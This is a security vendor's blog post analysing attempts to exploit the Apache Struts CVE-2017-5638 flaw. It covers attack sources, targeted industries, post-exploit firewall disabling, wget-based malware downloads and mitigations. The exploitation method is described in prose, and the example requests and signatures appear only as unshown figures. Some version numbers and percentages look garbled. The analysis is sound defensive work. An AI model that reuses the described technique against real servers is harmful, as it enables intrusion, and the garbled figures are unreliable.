Data Analysis of CVE-2017-5638 Exploit Attempts
A major vulnerability, the Apache Struts 2 0-Day vulnerability (CVE-2017-5638), was recently discovered on March 6, 2017. Here at NTT Security, we analyze these types of vulnerabilities, setup detection capabilities and analyze any exploit attempts by threat actors as detected via the NTT Security Global Managed Security Services Platform.
This blog takes a further look, via data analysis, into the active exploit attempts of the Apache Struts 2 0-Day vulnerability as seen in the NTT Security Global Managed Security Services Platform. Through our analysis, we were able to uncover the source of the attacks, industries targeted, malware samples, and more. Additionally, based on our research, we were able to conclude that exploit attempts for this vulnerability will remain popular for some time, and have listed migitation and recommended actions further below in this blog to avoid future exploit attempts.
On March 6, Apache released a security advisory (S2-045) concerning a vulnerability (CVE-2017-5638) in Struts 2 which could allow remote code execution (RCE). On March 7, a security researcher released a proof of concept (PoC) on Github concerning an RCE attack using the Content-Type header of an HTTP request to an Apache Struts 2 server. The PoC involved the use of the Apache Struts plugin, Jakarta Multipart parser, which when uploading a file with specific code inside of the Content-Type header, allowed for RCE.
Apache Struts 2 (CVE-2017-5638) Exploit Analysis
After discovery of the exploit, NTT Security analyzed our MSSP data to determine any exploit attempts. Below are basic statistics gathered from the MSSP data from March 9 - March 17.
Log Count: 8320
Event Count: 6194
Daily Average Count: 1040
Unique Attack Sources: 351
Unique Attack Source Countries: 13
Destination Ports: 80, 8080, 8011, 7253, 5000, 7219, 443, 9001, 8009, 7080, 8081, 4848, 14100 , 9093
Industries Targeted: Education (37%), Technology (5%), Finance (4%), Healthcare (28%), State/Local/Federal Government (<1%), Nosn-Profit (<1%), Manufacturing (2%), Retail (15%), Business Services (6%), Construction/Real Estate (<1%), Food/Beverage (<1%), Gaming/Entertainment (<1%)
NTT Security noticed exploit attempts almost immediately after signatures were installed. In Figure 1 below, the log count shows a slight decline up to March 12 before it continues to gradually increase over time, sharply increasing on March 17.
Figure 1: CVE-2017-5638 Log Count Over Time
A large increase in exploit attempts was attributed to servers hosted in China as shown in Figure 2 and Figure 3. Analysis shows 76 percent of all exploit attempts originated from China.
Figure 2: Attack Source Map
Figure 3: Attack Source Over Time
A further look into China’s post-exploit intentions show 69 percent attempted to disable local firewalls and install malware from remote servers using Linux retrieval commands such as wget. In some instances, wget was used but did not pull down any malicious binaries. These attempts allow the threat actors to track which servers are vulnerable and can retrieve additional binaries located on remote servers. Below is an example HTTP GET request from a server in China.
Figure 4: Example of HTTP Request Exploiting CVE-2017-5638
Additionally, specific HTTP POST requests contained mainAction.action in the URI. These requests were only sent from specific China-based servers and each attempted to pull down Linux 32-bit and 64-bit malware as shown in Figure 4. MainAction() appears to be a class inside of Apache Struts responsible for preparing business objects for main.jsp. NTT Security determined that these requests were only coming from Chinese sources where post-exploit intentions downloaded malware over Post Office Protocol (POP) port 110. This activity could be used to bypass additional firewall rules. The malware names that NTT Security gathered ranged from UpTip60 though UpTip97. We triaged this information, and were able to determine that the intended result of exploit attempts is still underway.
Exploit Intentions – Reconnaissance
We determined post-exploit intentions were either to download malware, as shown in Figure 3, or for reconnaissance efforts. Reconnaissance accounted for 69 percent of all exploit attempts, but in a few instances threat actors were attempting to disable local firewalls and download malware. Several payloads indicated threat actors were attempting to use common Linux commands such as ifconfig, uname –r, echo and more. As stated previously, some of the payloads we analyzed attempted to use wget to a remote server page, which is believed to be used for tracking purposes as there was no attempt to change the permissions of any downloaded binaries, and there were no attempts to execute any local file. An example of this can be found in Figure 5.
Figure 5: Example of HTTP Request and wget Tracking
Exploit Intentions – Installation
As shown in Figure 4, several analyzed payloads showed attempts to disable local firewalls like iptables and SuSEfirewall2. If firewalls were successfully disabled, threat actors would then attempt to download malware from remote locations over specific ports. Malware hosts were located in the United States, China, and South Korea; however, as shown in Figure 6, exploit attempts where malware installation attempts were conducted only sourced from servers in China and the United States, suggesting compromised servers in South Korea. Further analysis of the data shows malware hosted in South Korea was being requested during exploit attempts from China. Figure 6 shows a bubble chart of the CVE-2017-5638 attack sources that attempted to pull down malware as well. Each bubble represents a remote malware host and the number of requests to each. As shown, Chinese sources attempted to pull malware from servers hosted in South Korea by ISP providers eHostIDC and KT Corporation.
Figure 6: Attack Source Country and Malware Correlation Chart. Each bubble represents the source of the attack and a unique malware host associated. The large the bubble the more malware retrieval attempts.
We were able to retrieve several malware samples which threat actors attempted to install on vulnerable systems. These samples ranged from PERL DDoS bots to 32-bit and 64-bit ELF binaries. While analyzing the sample with hash value e6408aa9db0a1e09c8028f87d3a8f0cf, it was apparent a targeted list of IP addresses was hardcoded into the binary. These IP addresses were identified as a list of DNS servers leveraged for the DNS amplication capabilities of this sample. As shown in Figure 7, the functions are specific on their use and intentions such as CAttackIe and CAttackIcmp. Analysis and triaging these malware samples is still being conducted at the time of this writing.
Figure 7: e6408aa9db0a1e09c8028f87d3a8f0cf Hardcoded IPs and Functions
After analysis, we expect exploit attempts against CVE-2017-5638 will continue because of the simplicity of the vulnerability, popularity of the product and the ability to execute code remotely. Probing attempts in which threat actors are using wget to test if retrieving additional files is possible on vulnerable machines indicates threat actors will be targeting this list of hosts sooner rather than later.
- Apache Struts versions 2.3.5 – 2.3.3
- Apache Struts versions 2.5.0 – 2.5.10
Figure 8: Snort Signatures
Mitigation and Recommended Actions:
- Upgrade to Struts 2.3.32 or Struts 184.108.40.206
- Implement a Servlet filter which will validate Content-Type and throw away requests with suspicious values not matching multipart/form-data
- Change to a different multipart parser such as Pell or the parser from the Commons-File Upload Library
Read more on Solutionary Minds about: